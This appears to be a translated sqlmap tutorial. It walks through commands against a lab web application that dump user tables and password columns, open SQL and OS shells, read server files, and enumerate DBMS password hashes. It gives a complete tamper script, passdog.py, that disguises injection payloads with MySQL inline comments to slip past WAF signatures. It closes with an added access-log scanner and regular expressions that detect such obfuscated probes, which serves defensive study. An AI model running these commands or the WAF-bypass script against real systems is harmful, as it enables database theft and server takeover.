Preface
Introduction to the sqlmap tool
Concept
Official site: https://sqlmap.org/
Purpose: sqlmap is an open-source penetration testing tool that automates the detection and exploitation of SQL injection flaws and the takeover of database servers. It ships with a powerful detection engine, many niche features useful to a penetration tester, and a wide range of options.
Note: it comes preinstalled on Kali Linux.
Hands-on usage
Brief help: python sqlmap.py -h
Detailed help: python sqlmap.py -hh
Clear the session cache: python sqlmap.py --purge
Basic operations
Detect the vulnerability:
sqlmap -u 'http://192.168.244.1/bbs/showmessage.php?id=2'
Query the current database:
sqlmap -u 'http://192.168.244.1/bbs/showmessage.php?id=2' --current-db
List the tables in the current database:
sqlmap -u 'http://192.168.244.1/bbs/showmessage.php?id=2' -D jrlt --tables
List the columns of a given table:
sqlmap -u 'http://192.168.244.1/bbs/showmessage.php?id=2' -D jrlt -T users --columns
Dump the contents (data):
sqlmap -u 'http://192.168.244.1/bbs/showmessage.php?id=2' -D jrlt -T users -C password --dump
sqlmap -u 'http://192.168.244.1/bbs/showmessage.php?id=2' -D jrlt -T users -C name,password --dump
Extended operations
Execute SQL
sqlmap -u 'http://192.168.244.1/bbs/showmessage.php?id=2' --sql-shell
select * from users
Weak-password cracking (enumerates the DBMS users' password hashes; the flag is --passwords)
sqlmap -u 'http://192.168.244.1/bbs/showmessage.php?id=2' --passwords
Execute system commands
sqlmap -u 'http://192.168.244.1/bbs/showmessage.php?id=2' --os-shell
Read a file
sqlmap -u 'http://192.168.244.1/bbs/showmessage.php?id=2' --file-read "D:e.txt"
Bypassing a WAF with sqlmap
Baseline test (unsuccessful)
Enable the firewall first
sqlmap --purge
sqlmap -u 'http://192.168.244.1/bbs/showmessage.php?id=2' --dbs
Using a tamper script
Reference: https://github.com/w0x68y/bypassWAF/tree/master
Create passdog.py
# coding=UTF-8
from lib.core.enums import PRIORITY
from lib.core.settings import UNICODE_ENCODING

__priority__ = PRIORITY.LOW


def dependencies():
    pass


def tamper(payload, **kwargs):
    # Splices MySQL inline comments into the payload: /*!*/ is an empty
    # version-conditional comment the server simply skips, while /*!88888cas*/
    # carries a version number higher than any MySQL release, so its body is
    # ignored. The SQL therefore still executes, but a signature that matches
    # on the raw request text no longer sees the keywords.
    if payload:
        payload = payload.replace(" ", "/*!*/")
        payload = payload.replace("=", "/*!*/=/*!*/")
        payload = payload.replace("AND", "/*!*/AND/*!*/")
        payload = payload.replace("UNION", "union/*!88888cas*/")
        payload = payload.replace("#", "/*!*/#")
        payload = payload.replace("USER()", "USER/*!()*/")
        payload = payload.replace("DATABASE()", "DATABASE/*!()*/")
        payload = payload.replace("--", "/*!*/--")
        payload = payload.replace("SELECT", "/*!88888cas*/select")
        payload = payload.replace("FROM", "/*!99999c*//*!99999c*/from")
        payload = payload.replace('SLEEP(', 'sleep/**/(')
        payload = payload.replace('super_priv', '/*!29440/**/super_priv*/')
        payload = payload.replace('and host=', '/*!29440and*/host/*!11440=*/')
        payload = payload.replace('LIKE USER()', 'like (user/**/())')
        payload = payload.replace('CURRENT_USER()', 'CURRENT_USER/**/()')
        payload = payload.replace('SESSION_USER()', 'SESSION_USER(%0a)')
    return payload
Copy it into sqlmap's tamper directory
cd /usr/share/sqlmap/tamper/
Run sqlmap
sqlmap --purge
sqlmap -u 'http://192.168.244.1/bbs/showmessage.php?id=2' --tamper=passdog.py --random-agent --dbs
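Seen from the defending side, both the basic probes above and the passdog.py obfuscation leave traces in the web server's access log: sqlmap announces itself in its User-Agent unless --random-agent is used, and the inline-comment trick only hides keywords from a matcher that does not strip comments before it looks. The scanner below is an added example written for this article; it is not code from the original post, from sqlmap, or from the referenced bypassWAF repository. The combined-format log lines, the client address 192.0.2.10, the tag names and the regular expressions are all constructed for the demonstration. It URL-decodes each query string, replaces every /* ... */ block with whitespace, and then looks for the injection shapes that remain.

```python
import re
from urllib.parse import unquote

# Combined-log-format (Apache/nginx style) parser. Constructed for this example.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Any /* ... */ block, including MySQL's /*!NNNNN ... */ conditional form that
# passdog.py splices around every keyword. For detection the whole block is
# treated as whitespace: that over-strips the body of /*!...*/ comments, but the
# keywords the tamper leaves outside the comments are exactly what we want to see.
COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)

# Injection shapes that survive the tamper once the comments are gone.
SQLI_RE = re.compile(
    r"\bunion\s+(?:all\s+)?select\b"
    r"|\bsleep\s*\("
    r"|\bbenchmark\s*\("
    r"|\binformation_schema\b"
    r"|\b(?:and|or)\s+\d+\s*=\s*\d+\b",
    re.I,
)

# Constructed sample log lines (not from the original post).
SAMPLE_LOG = [
    # ordinary request
    '192.0.2.10 - - [10/Oct/2023:13:55:36 +0000] "GET /bbs/showmessage.php?id=2 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    # sqlmap's boolean probe sent with its default User-Agent
    '192.0.2.10 - - [10/Oct/2023:13:55:37 +0000] "GET /bbs/showmessage.php?id=2%20AND%201=1 HTTP/1.1" 200 512 "-" "sqlmap/1.7 (https://sqlmap.org)"',
    # a UNION probe after passdog.py plus --random-agent, URL-encoded as sqlmap sends it
    '192.0.2.10 - - [10/Oct/2023:13:55:38 +0000] "GET /bbs/showmessage.php?id=2%2F%2A%21%2A%2Funion%2F%2A%2188888cas%2A%2F%2F%2A%21%2A%2F%2F%2A%2188888cas%2A%2Fselect%2F%2A%21%2A%2F1%2C2 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
]


def normalize_sql(text: str) -> str:
    """URL-decode, drop every /* */ comment, and collapse runs of whitespace."""
    decoded = unquote(text)
    stripped = COMMENT_RE.sub(" ", decoded)
    return " ".join(stripped.split())


def parse_line(line: str):
    """Return the log fields as a dict, or None if the line is not combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(line: str) -> list:
    """Return the indicator tags raised by one access-log line (empty list = clean)."""
    rec = parse_line(line)
    if rec is None:
        return ["unparseable"]
    tags = []
    # sqlmap sets a "sqlmap/<version>" User-Agent unless --random-agent/--user-agent is given.
    if rec["ua"].lower().startswith("sqlmap"):
        tags.append("sqlmap-user-agent")
    query = rec["path"].partition("?")[2]
    # A MySQL inline comment inside a plain GET parameter is itself a strong signal.
    if "/*!" in unquote(query):
        tags.append("mysql-inline-comment")
    # Match only after normalisation, which is what the tamper is designed to defeat.
    if SQLI_RE.search(normalize_sql(query)):
        tags.append("sqli-pattern")
    return tags


def scan(lines):
    """Return (ip, path, tags) for every line that raises at least one indicator."""
    hits = []
    for line in lines:
        tags = classify(line)
        if tags:
            rec = parse_line(line) or {"ip": "?", "path": line.strip()}
            hits.append((rec["ip"], rec["path"], tags))
    return hits


if __name__ == "__main__":
    for ip, path, tags in scan(SAMPLE_LOG):
        print(f"{ip} {path} -> {', '.join(tags)}")
```

Run as a script it prints the two suspicious requests and stays silent on the clean one. The point worth taking away is the normalize_sql step: a WAF or IDS rule that matches on the raw request text is exactly what passdog.py defeats, whereas a rule applied after decoding and comment stripping sees "union select" again. Correlating the "mysql-inline-comment" tag with the "sqli-pattern" tag from the same client is also a cheap way to spot obfuscated scans even when the User-Agent has been randomised.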